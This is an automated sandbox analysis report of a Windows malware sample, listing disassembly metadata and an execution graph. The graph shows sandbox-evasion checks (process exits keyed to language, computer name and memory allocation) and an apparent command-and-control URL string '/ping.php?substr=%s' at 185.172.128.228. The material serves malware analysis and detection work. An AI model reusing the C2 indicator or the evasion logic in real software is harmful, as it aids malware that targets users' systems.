                                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                              • Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                                                                                              • Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                              • String ID: $.A
                                                                                                                                                                                                                              • API String ID: 1807457897-2696116503
                                                                                                                                                                                                                              • Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                                                                                              • Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0315A96A
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0315AA23
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                              • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction ID: ab4fefd495289a9c05f8342e5a0903fc13eb58ba1e586ac4982d84b2fc8ea424
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B41F334A80299DBCF11DF28C884AAEBBB5AF4D314F1882A5FC355B391D731DA45CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 031700D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                              • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction ID: cbb5bfa9df1a6deeb1cb05f046d42668cbf7adb40a9cf0d2bc198a09f2cf392a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11219862A01304A7EB34CB54C901BABB27EAB4DBF1F5F8565E909D7204E737D980C354
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                              • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 031762B6
                                                                                                                                                                                                                                • Part of subcall function 03151E19: __EH_prolog.LIBCMT ref: 03151E1E
                                                                                                                                                                                                                                • Part of subcall function 0315266A: __EH_prolog.LIBCMT ref: 0315266F
                                                                                                                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 03176398
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                              • String ID: ,jC
                                                                                                                                                                                                                              • API String ID: 420165198-3201430929
                                                                                                                                                                                                                              • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction ID: 5f6d3f1318f70d18bfda01ffae9fd4d81efb056fd91e8207d88daf26c6f1cb40
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2310B79D01219EFDB14DF94D980AEDF7B4FF48300F1085AAE815A7640DB346A48CF60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                              • String ID: -@
                                                                                                                                                                                                                              • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                              • Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                                                                                              • Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                                                                                              • API String ID: 3519838083-3577573015
                                                                                                                                                                                                                              • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction ID: 59cdab9d560d0d0a781bd6f7ba0639d41eab7686d8e36711611b743f9d56331c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C401AD7AA01215EBDB05DF98DC40BAEF7B9FF48650F14052AFC25DB240D374AA408AE5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                                                                                              • API String ID: 3519838083-3577573015
                                                                                                                                                                                                                              • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                              • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                              • String ID: T*@
                                                                                                                                                                                                                              • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                              • Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
                                                                                                                                                                                                                              • Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                              • String ID: u@@
                                                                                                                                                                                                                              • API String ID: 206117190-736001340
                                                                                                                                                                                                                              • Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
                                                                                                                                                                                                                              • Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0316A9D1
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0316A9DF
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0316AA3A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                              • Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                                                                                              • Instruction ID: a768311e9eeb60d81587b239c68c6763441357a2ed66de620dac6c8bee4485bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34410B74600286AFCF35CFE4CD447BABBA8DF09310F19916AF959BB1A1D7309921C761
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A778
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                              • Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
                                                                                                                                                                                                                              • Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:3.6%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:2.4%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:42
                                                                                                                                                                                                                              execution_graph 94950 6c003060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 94955 6c03ab2a 94950->94955 94954 6c0030db 94959 6c03ae0c _crt_atexit _register_onexit_function 94955->94959 94957 6c0030cd 94958 6c03b320 5 API calls ___raise_securityfailure 94957->94958 94958->94954 94959->94957 94960 6c0035a0 94961 6c0035c4 InitializeCriticalSectionAndSpinCount getenv 94960->94961 94976 6c003846 __aulldiv 94960->94976 94962 6c0038fc strcmp 94961->94962 94968 6c0035f3 __aulldiv 94961->94968 94965 6c003912 strcmp 94962->94965 94962->94968 94964 6c0038f4 94965->94968 94966 6c0035f8 QueryPerformanceFrequency 94966->94968 94967 6c00375c 94970 6c00376a QueryPerformanceCounter EnterCriticalSection 94967->94970 94972 6c0037b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 94967->94972 94975 6c0037fc LeaveCriticalSection 94967->94975 94967->94976 94968->94966 94968->94967 94969 6c003622 _strnicmp 94968->94969 94971 6c003944 _strnicmp 94968->94971 94973 6c00395d 94968->94973 94974 6c003664 GetSystemTimeAdjustment 94968->94974 94969->94968 94969->94971 94970->94967 94970->94972 94971->94968 94971->94973 94972->94967 94972->94975 94974->94968 94975->94967 94975->94976 94977 6c03b320 5 API calls ___raise_securityfailure 94976->94977 94977->94964 94978 6c01c930 GetSystemInfo VirtualAlloc 94979 6c01c9a3 GetSystemInfo 94978->94979 94985 6c01c973 94978->94985 94981 6c01c9d0 94979->94981 94982 6c01c9b6 94979->94982 94981->94985 94986 6c01c9d8 VirtualAlloc 94981->94986 94982->94981 94984 6c01c9bd 94982->94984 94983 6c01c99b 94984->94985 94987 6c01c9c1 VirtualFree 94984->94987 94994 6c03b320 5 API calls ___raise_securityfailure 94985->94994 94988 6c01c9f0 94986->94988 94989 6c01c9ec 94986->94989 94987->94985 94995 6c03cbe8 GetCurrentProcess TerminateProcess 94988->94995 94989->94985 94994->94983 94996 4136b0 95041 402130 94996->95041 95016 4136f0 95182 414400 GetProcessHeap HeapAlloc GetComputerNameA 95016->95182 95020 413724 95021 416fb0 4 API calls 95020->95021 95022 41372b 95021->95022 95023 416fb0 4 API calls 95022->95023 95024 413732 95023->95024 95025 416fb0 4 API calls 95024->95025 95026 413739 95025->95026 95027 416fb0 4 API calls 95026->95027 95028 413740 95027->95028 95192 416ea0 95028->95192 95030 413749 95031 4137cc 95030->95031 95033 413782 OpenEventA 95030->95033 95196 4135e0 GetSystemTime 95031->95196 95035 4137b5 CloseHandle Sleep 95033->95035 95036 413799 95033->95036 95038 4137ca 95035->95038 95040 4137a1 CreateEventA 95036->95040 95038->95030 95040->95031 95342 4043b0 LocalAlloc 95041->95342 95044 4043b0 2 API calls 95045 40215d 95044->95045 95046 4043b0 2 API calls 95045->95046 95047 402176 95046->95047 95048 4043b0 2 API calls 95047->95048 95049 40218f 95048->95049 95050 4043b0 2 API calls 95049->95050 95051 4021a8 95050->95051 95052 4043b0 2 API calls 95051->95052 95053 4021c1 95052->95053 95054 4043b0 2 API calls 95053->95054 95055 4021da 95054->95055 95056 4043b0 2 API calls 95055->95056 95057 4021f3 95056->95057 95058 4043b0 2 API calls 95057->95058 95059 40220c 95058->95059 95060 4043b0 2 API calls 95059->95060 95061 402225 95060->95061 95062 4043b0 2 API calls 95061->95062 95063 40223e 95062->95063 95064 4043b0 2 API calls 95063->95064 95065 402257 95064->95065 95066 4043b0 2 API calls 95065->95066 95067 402270 95066->95067 95068 4043b0 2 API calls 95067->95068 95069 402289 95068->95069 95070 4043b0 2 API calls 95069->95070 95071 4022a2 95070->95071 95072 4043b0 2 API calls 95071->95072 95073 4022bb 95072->95073 95074 4043b0 2 API calls 95073->95074 95075 4022d4 95074->95075 95076 4043b0 2 API calls 95075->95076 95077 4022ed 95076->95077 95078 4043b0 2 API calls 95077->95078 95079 402306 95078->95079 95080 4043b0 2 API calls 95079->95080 95081 40231f 95080->95081 95082 4043b0 2 API calls 95081->95082 95083 402338 95082->95083 95084 4043b0 2 API calls 95083->95084 95085 402351 95084->95085 95086 4043b0 2 API calls 95085->95086 95087 40236a 95086->95087 95088 4043b0 2 API calls 95087->95088 95089 402383 95088->95089 95090 4043b0 2 API calls 95089->95090 95091 40239c 95090->95091 95092 4043b0 2 API calls 95091->95092 95093 4023b5 95092->95093 95094 4043b0 2 API calls 95093->95094 95095 4023ce 95094->95095 95096 4043b0 2 API calls 95095->95096 95097 4023e7 95096->95097 95098 4043b0 2 API calls 95097->95098 95099 402400 95098->95099 95100 4043b0 2 API calls 95099->95100 95101 402419 95100->95101 95102 4043b0 2 API calls 95101->95102 95103 402432 95102->95103 95104 4043b0 2 API calls 95103->95104 95105 40244b 95104->95105 95106 4043b0 2 API calls 95105->95106 95107 402464 95106->95107 95108 4043b0 2 API calls 95107->95108 95109 40247d 95108->95109 95110 4043b0 2 API calls 95109->95110 95111 402496 95110->95111 95112 4043b0 2 API calls 95111->95112 95113 4024af 95112->95113 95114 4043b0 2 API calls 95113->95114 95115 4024c8 95114->95115 95116 4043b0 2 API calls 95115->95116 95117 4024e1 95116->95117 95118 4043b0 2 API calls 95117->95118 95119 4024fa 95118->95119 95120 4043b0 2 API calls 95119->95120 95121 402513 95120->95121 95122 4043b0 2 API calls 95121->95122 95123 40252c 95122->95123 95124 4043b0 2 API calls 95123->95124 95125 402545 95124->95125 95126 4043b0 2 API calls 95125->95126 95127 40255e 95126->95127 95128 415ed0 95127->95128 95346 415dc0 GetPEB 95128->95346 95130 415ed8 95131 416103 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 95130->95131 95132 415eea 95130->95132 95133 416164 GetProcAddress 95131->95133 95134 41617d 95131->95134 95135 415efc 21 API calls 95132->95135 95133->95134 95136 4161b6 95134->95136 95137 416186 GetProcAddress GetProcAddress 95134->95137 95135->95131 95138 4161d8 95136->95138 95139 4161bf GetProcAddress 95136->95139 95137->95136 95140 4161e1 GetProcAddress 95138->95140 95141 4161f9 95138->95141 95139->95138 95140->95141 95142 4136c0 95141->95142 95143 416202 GetProcAddress GetProcAddress 95141->95143 95144 416d40 95142->95144 95143->95142 95145 416d50 95144->95145 95146 4136cd 95145->95146 95147 416d7e lstrcpy 95145->95147 95148 401190 95146->95148 95147->95146 95149 4011a8 95148->95149 95150 4011d7 95149->95150 95151 4011cf ExitProcess 95149->95151 95152 401120 GetSystemInfo 95150->95152 95153 401144 95152->95153 95154 40113c ExitProcess 95152->95154 95155 4010d0 GetCurrentProcess VirtualAllocExNuma 95153->95155 95156 401101 ExitProcess 95155->95156 95157 401109 95155->95157 95347 401060 VirtualAlloc 95157->95347 95160 4011e0 95351 415090 95160->95351 95163 401209 __aulldiv 95164 40125a 95163->95164 95165 401252 ExitProcess 95163->95165 95166 413430 GetUserDefaultLangID 95164->95166 95167 413493 95166->95167 95168 413452 95166->95168 95174 401150 95167->95174 95168->95167 95169 413481 ExitProcess 95168->95169 95170 413463 ExitProcess 95168->95170 95171 413477 ExitProcess 95168->95171 95172 41348b ExitProcess 95168->95172 95173 41346d ExitProcess 95168->95173 95172->95167 95175 414400 3 API calls 95174->95175 95176 40115e 95175->95176 95177 40118c 95176->95177 95353 4143c0 GetProcessHeap HeapAlloc GetUserNameA 95176->95353 95181 4143c0 GetProcessHeap HeapAlloc GetUserNameA 95177->95181 95179 401177 95179->95177 95180 401184 ExitProcess 95179->95180 95181->95016 95183 413703 95182->95183 95184 416fb0 95183->95184 95354 416d10 95184->95354 95186 416fc1 lstrlen 95187 416fe0 95186->95187 95188 417018 95187->95188 95190 416ffa lstrcpy lstrcat 95187->95190 95355 416da0 95188->95355 95190->95188 95191 417024 95191->95020 95193 416ebb 95192->95193 95194 416f0b 95193->95194 95195 416ef9 lstrcpy 95193->95195 95194->95030 95195->95194 95359 4134e0 95196->95359 95198 41364e 95199 413658 sscanf 95198->95199 95388 416e00 95199->95388 95201 41366a SystemTimeToFileTime SystemTimeToFileTime 95202 4136a0 95201->95202 95203 41368e 95201->95203 95205 412bb0 95202->95205 95203->95202 95204 413698 ExitProcess 95203->95204 95206 412bbd 95205->95206 95207 416d40 lstrcpy 95206->95207 95208 412bcb 95207->95208 95390 416e20 lstrlen 95208->95390 95211 416e20 2 API calls 95212 412bed 95211->95212 95213 416e20 2 API calls 95212->95213 95214 412bfa 95213->95214 95215 416e20 2 API calls 95214->95215 95216 412c07 95215->95216 95394 402590 95216->95394 95221 416e20 2 API calls 95222 412cd5 95221->95222 95223 416fb0 4 API calls 95222->95223 95224 412ceb 95223->95224 95225 416ea0 lstrcpy 95224->95225 95226 412cf4 95225->95226 95227 416d40 lstrcpy 95226->95227 95228 412d11 95227->95228 95229 416fb0 4 API calls 95228->95229 95230 412d2a 95229->95230 95231 416ea0 lstrcpy 95230->95231 95232 412d36 95231->95232 95233 416fb0 4 API calls 95232->95233 95234 412d5a 95233->95234 95235 416ea0 lstrcpy 95234->95235 95236 412d66 95235->95236 95237 416d40 lstrcpy 95236->95237 95238 412d8b 95237->95238 96038 4141c0 GetWindowsDirectoryA 95238->96038 95241 416da0 lstrcpy 95242 412da2 95241->95242 96048 404540 95242->96048 95244 412da8 96193 40fae0 95244->96193 95246 412db0 95247 416d40 lstrcpy 95246->95247 95248 412dd3 95247->95248 96211 401500 95248->96211 95252 412de7 96366 40f3b0 95252->96366 95254 412def 95255 416d40 lstrcpy 95254->95255 95256 412e13 95255->95256 95257 401500 lstrcpy 95256->95257 